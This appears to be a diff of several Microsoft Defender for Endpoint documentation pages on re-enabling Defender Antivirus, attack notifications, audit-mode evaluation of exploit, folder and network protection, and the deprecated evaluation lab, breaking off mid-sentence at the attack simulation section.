-3. Reinstall Microsoft Defender Antivirus or re-enable it. For more information on how to reinstall or re-enable Microsoft Defender Antivirus on Windows Server, see [Re-enable Microsoft Defender Antivirus on Windows Server if it was disabled](#re-enable-microsoft-defender-antivirus-on-windows-server-if-it-was-disabled) and [Re-enable Microsoft Defender Antivirus on Windows Server if it was uninstalled](#re-enable-microsoft-defender-antivirus-on-windows-server-if-it-was-uninstalled).
-4. Reboot the system.
-5. Install the latest version of the platform update.
-
- > [!NOTE]
- > Re-enabling Microsoft Defender Antivirus doesn't automatically install the platform update. You can download and install the latest platform version using Windows update. Alternatively, you can download the update package from the [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/Search.aspx?q=KB4052623) or from the [Antimalware and cyber security portal](https://go.microsoft.com/fwlink/?linkid=870379&arch=x64).
- >
- > If you're preparing to install the modern, unified solution on Windows Server 2016, you can leverage the [Installer help script](https://github.com/microsoft/mdefordownlevelserver/blob/main/Install.ps1) to automate the platform update and the subsequent installation and onboarding. This script can also assist in re-enabling Microsoft Defender Antivirus.
-
-## Re-enable Microsoft Defender Antivirus on Windows Server if it was disabled
-
-First, ensure that Microsoft Defender Antivirus is not disabled either through Group Policy or registry. For more information, see [Troubleshoot Microsoft Defender Antivirus while migrating from a third-party solution](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus-when-migrating).
-
-If Microsoft Defender Antivirus features and installation files were previously removed from Windows Server 2016, follow the guidance in [Configure a Windows Repair Source](/windows-hardware/manufacture/desktop/configure-a-windows-repair-source) to restore the feature installation files.
-
-On Windows Server 2016, in some cases, you may need to use the [Malware Protection Command-Line Utility](command-line-arguments-microsoft-defender-antivirus.md) to re-enable Microsoft Defender Antivirus.
-
-As a local administrator on the server, perform the following steps:
-
-1. Open Command Prompt.
-2. Run the following command:
- `MpCmdRun.exe -wdenable`.
-3. Restart the device.
-
-## Re-enable Microsoft Defender Antivirus on Windows Server if it was uninstalled
-
-In case the Defender feature was uninstalled/removed, you can add it back.
-
-As a local administrator on the server, perform the following steps:
-
-1. Open Windows PowerShell.
-
-2. Run the following commands:
-
- ```powershell
- # For Windows Server 2016
- Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Features
- Dism /Online /Enable-Feature /FeatureName:Windows-Defender
- Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Gui
-
- # For Windows Server 1803 and later, including Windows Server 2019 and 2022
- Dism /Online /Enable-Feature /FeatureName:Windows-Defender
- ```
-
- When the DISM command is being used within a task sequence running PowerShell, the following path to cmd.exe is required.
-
- ```powershell
- C:\Windows\System32\cmd.exe /c Dism /Online /Enable-Feature /FeatureName:Windows-Defender-Features
- C:\Windows\System32\cmd.exe /c Dism /Online /Enable-Feature /FeatureName:Windows-Defender
- ```
-
- > [!NOTE]
- > You can also use Server Manager or PowerShell cmdlets to install the Microsoft Defender Antivirus feature.
-
-3. Reboot the system.
-
-## Related articles
-
-[Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Endpoint Attack Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/endpoint-attack-notifications.md
- Title: Endpoint Attack Notifications-
-description: Endpoint Attack Notifications provides proactive hunting for the most important threats to your network.
------- m365-security-- tier2-- Previously updated : 09/23/2022--
-# Endpoint Attack Notifications
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!NOTE]
-> This covers threat hunting on your Microsoft Defender for Endpoint service. However, if you're interested to explore the service beyond your current license, and proactively hunt threats not just on endpoints but also across Office 365, cloud applications, and identity, refer to [Microsoft Defender Experts for Hunting](/microsoft-365/security/defender/defender-experts-for-hunting).
-
-> [!NOTE]
-> Customers who signed up for Experts on Demand prior to sunset will have access to Ask Defender Experts until the expiration of their current contract.
-
-Endpoint Attack Notifications (previously referred to as Microsoft Threat Experts - Targeted Attack Notification) provides proactive hunting for the most important threats to your network, including human adversary intrusions, hands-on-keyboard attacks, or advanced attacks like cyber-espionage. These notifications show up as a new alert. The managed hunting service includes:
--- Threat monitoring and analysis, reducing dwell time and risk to the business-- Hunter-trained artificial intelligence to discover and prioritize both known and unknown attacks-- Identifying the most important risks, helping SOCs maximize time and energy-- Scope of compromise and as much context as can be quickly delivered to enable fast SOC response--
-![Screenshot of the Endpoint Attack Notifications alert](../../media/defender-endpoint/endpoint-attack-notification-alert.png)
-
-## Apply for Endpoint Attack Notifications
-If you're a Microsoft Defender for Endpoint customer, you can apply for Endpoint Attack Notifications. Go to **Settings** \> **Endpoints** \> **General** \> **Advanced features** \> **Endpoint Attack Notifications** to apply. Once accepted, you'll get the benefits of Endpoint Attack Notifications.
-
-![How to enable Endpoint Attack Notifications in 365 Defender Portal](../../media/defender-endpoint/enable-endpoint-attack-notifications.png)
-
-## Receive Endpoint Attack notifications
-Endpoint Attack Notifications are alerts that have been hand crafted by Microsoft's managed hunting service based on suspicious activity in your environment. They can be viewed through several mediums:
-- The alerts queue in the Microsoft Defender portal-- Using the [API](../../security/defender-endpoint/get-alerts.md)-- [DeviceAlertEvents](../../security/defender-endpoint/advanced-hunting-devicealertevents-table.md) table in Advanced hunting-- Your email if you [configure an email notifications](../../security/defender-endpoint/configure-vulnerability-email-notifications.md) rule-
-Endpoint Attack Notifications can be identified by:
-- Have a tag named **Endpoint Attack Notification**-- Have a service source of **Microsoft Defender for Endpoint** \> **Microsoft Defender Experts**-
-> [!NOTE]
-> If you have enrolled for Endpoint Attack Notifications but are not seeing any alerts from the service, it indicates that you have a strong security posture and are less prone to attacks.
-
-## Create an email notification rule
-You can create rules to send email notifications for notification recipients. See [Configure alert notifications](configure-email-notifications.md) to create, edit, delete, or troubleshoot email notification, for details.
--
-## Next steps
--- To proactively hunt threats across endpoints, Office 365, cloud applications, and identity, refer to [Microsoft Defender Experts for Hunting](../defender/defender-experts-for-hunting.md).
security Evaluate Controlled Folder Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-controlled-folder-access.md
- Title: Evaluate controlled folder access
-description: See how controlled folder access can help protect files from malicious apps.
---------- m365-security-- tier2-- mde-asr Previously updated : 12/18/2020--
-# Evaluate controlled folder access
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
-[Controlled folder access](controlled-folders.md) is a feature that helps protect your documents and files from modification by suspicious or malicious apps. Controlled folder access is supported on Windows Server 2019, Windows Server 2022, Windows 10, and Windows 11 clients.
-
-It's especially useful in helping protect against [ransomware](https://www.microsoft.com/wdsi/threats) that attempts to encrypt your files and hold them hostage.
-
-This article helps you evaluate controlled folder access. It explains how to enable audit mode so you can test the feature directly in your organization.
-
-## Use audit mode to measure impact
-
-Enable the controlled folder access in audit mode to see a record of what could occur if it were enabled. Test how the feature works in your organization to ensure it doesn't affect your line-of-business apps. You can also get an idea of how many suspicious attempts to modify files generally occur over a certain period of time.
-
-To enable audit mode, use the following PowerShell cmdlet:
-
-```PowerShell
-Set-MpPreference -EnableControlledFolderAccess AuditMode
-```
-
-> [!TIP]
-> If you want to fully audit how controlled folder access will work in your organization, you'll need to use a management tool to deploy this setting to devices in your network(s).
-You can also use Group Policy, Intune, mobile device management (MDM), or Microsoft Configuration Manager to configure and deploy the setting, as described in the main [controlled folder access topic](controlled-folders.md).
-
-## Review controlled folder access events in Windows Event Viewer
-
-The following controlled folder access events appear in Windows Event Viewer under Microsoft/Windows/Windows Defender/Operational folder.
-
-| Event ID | Description |
-| --|--|
-| 5007 | Event when settings are changed |
-| 1124 | Audited controlled folder access event |
-| 1123 | Blocked controlled folder access event |
-
-> [!TIP]
-> You can configure a [Windows Event Forwarding subscription](/windows/win32/wec/setting-up-a-source-initiated-subscription) to collect the logs centrally.
-
-## Customize protected folders and apps
-
-During your evaluation, you might want to add to the list of protected folders, or allow certain apps to modify files.
-
-See [Protect important folders with controlled folder access](controlled-folders.md) for configuring the feature with management tools, including Group Policy, PowerShell, and MDM configuration service providers (CSPs).
-
-## See also
--- [Protect important folders with controlled folder access](controlled-folders.md)-- [Evaluate Microsoft Defender for Endpoint](evaluate-mde.md)-- [Use audit mode](audit-windows-defender.md)-
security Evaluate Exploit Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-exploit-protection.md
- Title: See how Exploit protection works in a demo
-description: See how Exploit Protection can prevent suspicious behaviors from occurring on specific apps.
---------- m365-security-- tier2-- mde-asr Previously updated : 12/18/2020--
-# Evaluate exploit protection
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
-[Exploit protection](exploit-protection.md) helps protect devices from malware that uses exploits to spread and infect other devices. Mitigation can be applied to either the operating system or to an individual app. Many of the features that were part of the Enhanced Mitigation Experience Toolkit (EMET) are included in exploit protection. (The EMET has reached its end of support.)
-
-In audit, you can see how mitigation works for certain apps in a test environment. This shows what *would* have happened if you enabled exploit protection in your production environment. This way, you can verify that exploit protection doesn't adversely affect your line-of-business apps, and see which suspicious or malicious events occur.
-
-## Enable exploit protection for testing
-
-You can set mitigations in a testing mode for specific programs by using the Windows Security app or Windows PowerShell.
-
-### Windows Security app
-
-1. Open the Windows Security app. Select the shield icon in the task bar or search the start menu for **Windows Security**.
-
-2. Select the **App & browser control** tile (or the app icon on the left menu bar) and then select **Exploit protection**.
-
-3. Go to **Program settings** and choose the app you want to apply protection to:
-
- 1. If the app you want to configure is already listed, select it and then select **Edit**
- 2. If the app isn't listed at the top of the list select **Add program to customize**. Then, choose how you want to add the app.
- - Use **Add by program name** to have the mitigation applied to any running process with that name. Specify a file with an extension. You can enter a full path to limit the mitigation to only the app with that name in that location.
- - Use **Choose exact file path** to use a standard Windows Explorer file picker window to find and select the file you want.
-
-4. After selecting the app, you'll see a list of all the mitigations that can be applied. Choosing **Audit** will apply the mitigation in test mode only. You'll be notified if you need to restart the process, app, or Windows.
-
-5. Repeat this procedure for all the apps and mitigations you want to configure. Select **Apply** when you're done setting up your configuration.
-
-### PowerShell
-
-To set app-level mitigations to test mode, use `Set-ProcessMitigation` with the **Audit mode** cmdlet.
-
-Configure each mitigation in the following format:
-
-```PowerShell
-Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>
-```
-
-Where:
--- \<Scope\>:
- - `-Name` to indicate the mitigations should be applied to a specific app. Specify the app's executable after this flag.
-- \<Action\>:
- - `-Enable` to enable the mitigation
- - `-Disable` to disable the mitigation
-- \<Mitigation\>:
- - The mitigation's cmdlet as defined in the following table. Each mitigation is separated with a comma.
-
-|Mitigation|Test mode cmdlet|
-|||
-|Arbitrary Code Guard (ACG)|`AuditDynamicCode`|
-|Block low integrity images|`AuditImageLoad`
-|Block untrusted fonts|`AuditFont`, `FontAuditOnly`|
-|Code integrity guard|`AuditMicrosoftSigned`, `AuditStoreSigned`|
-|Disable Win32k system calls|`AuditSystemCall`|
-|Don't allow child processes|`AuditChildProcess`|
-
-For example, to enable Arbitrary Code Guard (ACG) in test mode for an app named *testing.exe*, run the following command:
-
-```PowerShell
-Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable AuditDynamicCode
-```
-
-You can disable **audit mode** by replacing `-Enable` with `-Disable`.
-
-## Review exploit protection audit events
-
-To review which apps would have been blocked, open Event Viewer and filter for the following events in the Security-Mitigations log.<br/><br/>
-
-|Feature|Provider/source|Event ID|Description|
-|||--||
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|1|ACG audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|3|Do not allow child processes audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|5|Block low integrity images audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|7|Block remote images audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|9|Disable win32k system calls audit|
-|Exploit protection|Security-Mitigations (Kernel Mode/User Mode)|11|Code integrity guard audit|
-
-## See also
--- [Enable exploit protection](enable-exploit-protection.md)-- [Configure and audit exploit protection mitigations](customize-exploit-protection.md)-- [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)-- [Troubleshoot exploit protection](troubleshoot-exploit-protection-mitigations.md)
security Evaluate Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-mde.md
- Title: Evaluate Microsoft Defender for Endpoint-
-description: Evaluate the different security capabilities in Microsoft Defender for Endpoint.
------- m365-security-- tier2- Previously updated : 03/25/2021--
-# Evaluate Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
-[Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2154037) is a unified platform for preventative protection, post-breach detection, automated investigation, and response.
-
-You can evaluate Microsoft Defender for Endpoint in your organization by [starting your free trial](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial).
-
-You can also evaluate the different security capabilities in Microsoft Defender for Endpoint by using the following instructions.
-
-## Evaluate attack surface reduction
-
-These capabilities help prevent attacks and exploitations from infecting your organization.
--- [Evaluate exploit protection](./evaluate-exploit-protection.md)-- [Evaluate network protection](./evaluate-exploit-protection.md)-- [Evaluate controlled folder access](./evaluate-controlled-folder-access.md)-- [Evaluate application guard](/windows/security/threat-protection/microsoft-defender-application-guard/test-scenarios-md-app-guard)-- [Evaluate network firewall](/windows/security/threat-protection/windows-firewall/evaluating-windows-firewall-with-advanced-security-design-examples)-
-## Evaluate next-generation protection
-
-Next gen protections help detect and block the latest threats.
--- [Evaluate antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/evaluate-microsoft-defender-antivirus)-
-## See Also
-
-[Microsoft Defender for Endpoint overview](microsoft-defender-endpoint.md)
security Evaluate Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-microsoft-defender-antivirus.md
- Title: Evaluate Microsoft Defender Antivirus
-description: Businesses of all sizes can use this guide to evaluate and test the protection offered by Microsoft Defender Antivirus in Windows.
----- Previously updated : 10/18/2018------ m365-security-- tier2-- mde-ngp--
-# Evaluate Microsoft Defender Antivirus
---
-**Applies to:**
--- Microsoft Defender Antivirus-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-**Platforms**
--- Windows-
-Use this guide to determine how well Microsoft Defender Antivirus protects you from viruses, malware, and potentially unwanted applications. It explains the important next-generation protection features of Microsoft Defender Antivirus available for both small and large enterprises, and how they increase malware detection and protection across your network.
-
-You can choose to configure and evaluate each setting independently, or all at once. We have grouped similar settings based upon typical evaluation scenarios, and include instructions for using PowerShell to enable the settings.
-
-The guide is available:
--- [Evaluate Microsoft Defender Antivirus using PowerShell](microsoft-defender-antivirus-using-powershell.md)-- in PDF format for offline viewing: [Download the guide in PDF format](https://www.microsoft.com/download/details.aspx?id=54795).-
-You can also download a PowerShell that will enable all the settings described in the guide automatically. You can obtain the script alongside the PDF download above, or individually from PowerShell Gallery:
--- [Download the PowerShell script to automatically configure the settings](https://www.powershellgallery.com/packages/WindowsDefender_InternalEvaluationSettings)-
-> [!IMPORTANT]
-> The guide is currently intended for single-machine evaluation of Microsoft Defender Antivirus. Enabling all of the settings in this guide may not be suitable for real-world deployment.
->
-> For the latest recommendations for real-world deployment and monitoring of Microsoft Defender Antivirus across a network, see [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related topics
--- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)-
security Evaluate Network Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-network-protection.md
- Title: Evaluate network protection
-description: See how network protection works by testing common scenarios that it protects against.
---------- m365-security-- tier2-- mde-asr Previously updated : 03/28/2024--
-# Evaluate network protection
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-[Network protection](network-protection.md) helps prevent employees from using any application to access dangerous domains that might host phishing scams, exploits, and other malicious content on the Internet.
-
-This article helps you evaluate network protection by enabling the feature and guiding you to a testing site. The sites in this evaluation article aren't malicious. They're specially created websites that pretend to be malicious. The site replicates the behavior that would happen if a user visited a malicious site or domain.
-
-## Enable network protection in audit mode
-
-Enable network protection in audit mode to see which IP addresses and domains might be blocked. You can make sure it doesn't affect line-of-business apps, or get an idea of how often blocks occur.
-
-1. Type **powershell** in the Start menu, right-click **Windows PowerShell** and select **Run as administrator**.
-
-2. Run the following cmdlet:
-
- ```PowerShell
- Set-MpPreference -EnableNetworkProtection AuditMode
- ```
-
-### Visit a (fake) malicious domain
-
-1. Open Internet Explorer, Google Chrome, or any other browser of your choice.
-
-2. Go to [https://smartscreentestratings2.net](https://smartscreentestratings2.net).
-
- The network connection is allowed and a test message displays.
-
- :::image type="content" source="media/np-notif.png" alt-text="The connection blockage notification" lightbox="media/np-notif.png":::
-
-> [!NOTE]
-> Network connections can be successful even though a site is blocked by network protection. To learn more, see [Network protection and the TCP three-way handshake](network-protection.md#network-protection-and-the-tcp-three-way-handshake).
-
-## Review network protection events in Windows Event Viewer
-
-To review apps that would have been blocked, open Event Viewer and filter for Event ID 1125 in the Microsoft-Windows-Windows Defender/Operational log. The following table lists all network protection events.
-
-| Event ID | Provide/Source | Description |
-||||
-| 5007 | Windows Defender (Operational) | Event when settings are changed |
-| 1125 | Windows Defender (Operational) | Event when a network connection is audited |
-| 1126 | Windows Defender (Operational) | Event when a network connection is blocked |
-
-### Troubleshooting Network Protection
-
-If network protection fails to detect, make sure that the following prerequisites are enabled:
-
-1. Microsoft Defender Antivirus is the primary antivirus app (active mode)
-
-2. [Behavior Monitoring is enabled](/microsoft-365/security/defender-endpoint/behavior-monitor)
-
-3. [Cloud Protection is enabled](/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus)
-
-4. [Cloud Protection network connectivity is functional](/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus)
-
-## Related articles
--- [Network protection](network-protection.md)--- [Network protection and the TCP three-way handshake](network-protection.md#network-protection-and-the-tcp-three-way-handshake)--- [Enable network protection](enable-network-protection.md)--- [Troubleshoot network protection](troubleshoot-np.md)-
security Evaluation Lab https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluation-lab.md
- Title: Microsoft Defender for Endpoint evaluation lab
-description: Learn about Microsoft Defender for Endpoint capabilities, run attack simulations, and see how it prevents, detects, and remediates threats.
------
- - m365-security
- - m365solution-evalutatemtp
- - highpri
- - tier1
- Previously updated : 02/27/2024--
-# Microsoft Defender for Endpoint evaluation lab
-
- > [!IMPORTANT]
- > **The Microsoft Defender for Endpoint evaluation lab was deprecated in January, 2024**.
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
- > [!IMPORTANT]
- > As Microsoft continues to evaluate the value of the features and services to provide, Microsoft has made the decision to retire the Defender Evaluation Lab.
- > This change will rollout in mid-January 2024 and expect to complete by late January 2024.
-
-Conducting a comprehensive security product evaluation can be a complex process requiring cumbersome environment and device configuration before an end-to-end attack simulation can actually be done. Adding to the complexity is the challenge of tracking where the simulation activities, alerts, and results are reflected during the evaluation.
-
-The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the complexities of device and environment configuration so that you can focus on evaluating the capabilities of the platform, running simulations, and seeing the prevention, detection, and remediation features in action.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4qLUM]
-
-With the simplified set-up experience, you can focus on running your own test scenarios and the pre-made simulations to see how Defender for Endpoint performs.
-
-You'll have full access to the powerful capabilities of the platform such as automated investigations, advanced hunting, and threat analytics, allowing you to test the comprehensive protection stack that Defender for Endpoint offers.
-
-You can add Windows 10, Windows 11, Windows Server 2019, Windows Server 2016, and Linux (Ubuntu) devices that come pre-configured to have the latest OS versions and the right security components in place as well as Office 2019 Standard installed.
-
-You can also install threat simulators. Defender for Endpoint has partnered with industry leading threat simulation platforms to help you test out the Defender for Endpoint capabilities without having to leave the portal.
-
-Install your preferred simulator, run scenarios within the evaluation lab, and instantly see how the platform performs - all conveniently available at no extra cost to you. You'll also have convenient access to wide array of simulations which you can access and run from the simulations catalog.
-
-## Before you begin
-
-You'll need to fulfill the [licensing requirements](minimum-requirements.md#licensing-requirements) or have trial access to Microsoft Defender for Endpoint to access the evaluation lab.
-
-You must have **Manage security settings** permissions to:
--- Create the lab-- Create devices-- Reset password-- Create simulations-
-If you enabled role-based access control (RBAC) and created at least a one machine group, users must have access to All machine groups.
-
-For more information, see [Create and manage roles](user-roles.md).
-
-Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-main-abovefoldlink)
-
-## Get started with the lab
-
-You can access the lab from the menu. In the navigation menu, select **Evaluation and tutorials > Evaluation lab**.
-
-> [!NOTE]
->
-> - Depending the type of environment structure you select, devices will be available for the specified number of hours from the day of activation.
-> - Each environment is provisioned with a limited set of test devices. When you've used up the provisioned devices and have deleted them, you can request for more devices.
-> - You can request for lab resources once a month.
-
-Already have a lab? Make sure to enable the new threat simulators and have active devices.
-
-## Setup the evaluation lab
-
-1. In the navigation pane, select **Evaluation & tutorials** \> **Evaluation lab**, then select **Setup lab**.
-
- :::image type="content" source="../../media/evaluationtutormenu.png" alt-text="The evaluation lab welcome page" lightbox="../../media/evaluationtutormenu.png":::
-
-2. Depending on your evaluation needs, you can choose to setup an environment with fewer devices for a longer period or more devices for a shorter period. Select your preferred lab configuration then select **Next**.
-
- :::image type="content" source="media/lab-creation-page.png" alt-text="The lab configuration options" lightbox="media/lab-creation-page.png":::
-
-3. (Optional) You can choose to install threat simulators in the lab.
-
- :::image type="content" source="media/install-agent.png" alt-text="The install simulators agent page" lightbox="media/install-agent.png":::
-
- > [!IMPORTANT]
- > You'll first need to accept and provide consent to the terms and information sharing statements.
-
-4. Select the threat simulation agent you'd like to use and enter your details. You can also choose to install threat simulators at a later time. If you choose to install threat simulation agents during the lab setup, you'll enjoy the benefit of having them conveniently installed on the devices you add.
-
- :::image type="content" source="media/lab-setup-summary.png" alt-text="The summary page" lightbox="media/lab-setup-summary.png":::
-
-5. Review the summary and select **Setup lab**.
-
-After the lab setup process is complete, you can add devices and run simulations.
-
-## Add devices
-
-When you add a device to your environment, Defender for Endpoint sets up a well-configured device with connection details. You can add Windows 10, Windows 11, Windows Server 2019, Windows Server 2016, and Linux (Ubuntu).
-
-The device will be configured with the most up-to-date version of the OS and Office 2019 Standard as well as other apps such as Java, Python, and SysIntenals.
-
-If you chose to add a threat simulator during the lab setup, all devices will have the threat simulator agent installed in the devices that you add.
-
-The device will automatically be onboarded to your tenant with the recommended Windows security components turned on and in audit mode - with no effort on your side.
-
-The following security components are pre-configured in the test devices:
--- [Attack surface reduction](attack-surface-reduction.md)-- [Block at first sight](configure-block-at-first-sight-microsoft-defender-antivirus.md)-- [Controlled folder access](controlled-folders.md)-- [Exploit protection](enable-exploit-protection.md)-- [Network protection](network-protection.md)-- [Potentially unwanted application detection](detect-block-potentially-unwanted-apps-microsoft-defender-antivirus.md)-- [Cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md)-- [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview)-
-> [!NOTE]
-> Microsoft Defender Antivirus will be on (not in audit mode). If Microsoft Defender Antivirus blocks you from running your simulation, you can turn off real-time protection on the device through Windows Security. For more information, see [Configure always-on protection](configure-real-time-protection-microsoft-defender-antivirus.md).
-
-Automated investigation settings will be dependent on tenant settings. It will be configured to be semi-automated by default. For more information, see [Overview of Automated investigations](automated-investigations.md).
-
-> [!NOTE]
-> The connection to the test devices is done using RDP. Make sure that your firewall settings allow RDP connections.
-
-1. From the dashboard, select **Add device**.
-
-2. Choose the type of device to add. You can choose to add Windows 10, Windows 11, Windows Server 2019, Windows Server 2016, and Linux (Ubuntu).
-
- :::image type="content" source="../../media/add-machine-optionsnew.png" alt-text="The lab setup with device options" lightbox="../../media/add-machine-optionsnew.png":::
-
- > [!NOTE]
- > If something goes wrong with the device creation process, you'll be notified and you'll need to submit a new request. If the device creation fails, it will not be counted against the overall allowed quota.
-
-3. The connection details are displayed. Select **Copy** to save the password for the device.
-
- > [!NOTE]
- > The password is only displayed once. Be sure to save it for later use.
-
- :::image type="content" source="../../media/add-machine-eval-lab-new.png" alt-text="The device added with connection details" lightbox="../../media/add-machine-eval-lab-new.png":::
-
-4. Device set up begins. This can take up to approximately 30 minutes.
-
-5. See the status of test devices, the risk and exposure levels, and the status of simulator installations by selecting the **Devices** tab.
-
- :::image type="content" source="media/machines-tab.png" alt-text="The devices tab" lightbox="media/machines-tab.png":::
-
- > [!TIP]
- > In the **Simulator status** column, you can hover over the information icon to know the installation status of an agent.
-
-## Add a domain controller
-
-Add a domain controller to run complex scenarios such as lateral movement and multistage attacks across multiple devices.
-
-> [!NOTE]
-> Domain support is only available in the Microsoft Defender portal (security.microsoft.com).
-
-1. From the dashboard, select **Add device**.
-
-2. Select **Windows Server 2019**, then select **Set as domain controller**.
-
-3. When your domain controller has been provisioned, you'll be able to create domain-joined devices by clicking **Add device**. Then select Windows 10 / Windows 11, and select **Join to domain**.
-
-> [!NOTE]
-> Only one domain controller can be live at a time. The domain controller device will remain live as long as there is a live device connected to it.
-
-## Request for more devices
-
-When all existing devices are used and deleted, you can request for more devices. You can request for lab resources once a month.
-
-1. From the evaluation lab dashboard, select **Request for more devices**.
-
- :::image type="content" source="media/request-more-devices.png" alt-text="The request for more devices option" lightbox="media/request-more-devices.png":::
-
-2. Choose your configuration.
-3. Submit the request.
-
-When the request is submitted successfully you'll see a green confirmation banner and the date of the last submission.
-
-You can find the status of your request in the **User Actions** tab, which will be approved in a matter of hours.
-
-When approved, the requested devices will be added to your lab set up and you'll be able to create more devices.
-
-> [!TIP]
-> To get more out of your lab, don't forget to check out our simulations library.
-
-## Simulate attack scenarios
-
-Use the test devices to run your own attack simulations by connecting to them.
-
-You can simulate attack scenarios using:
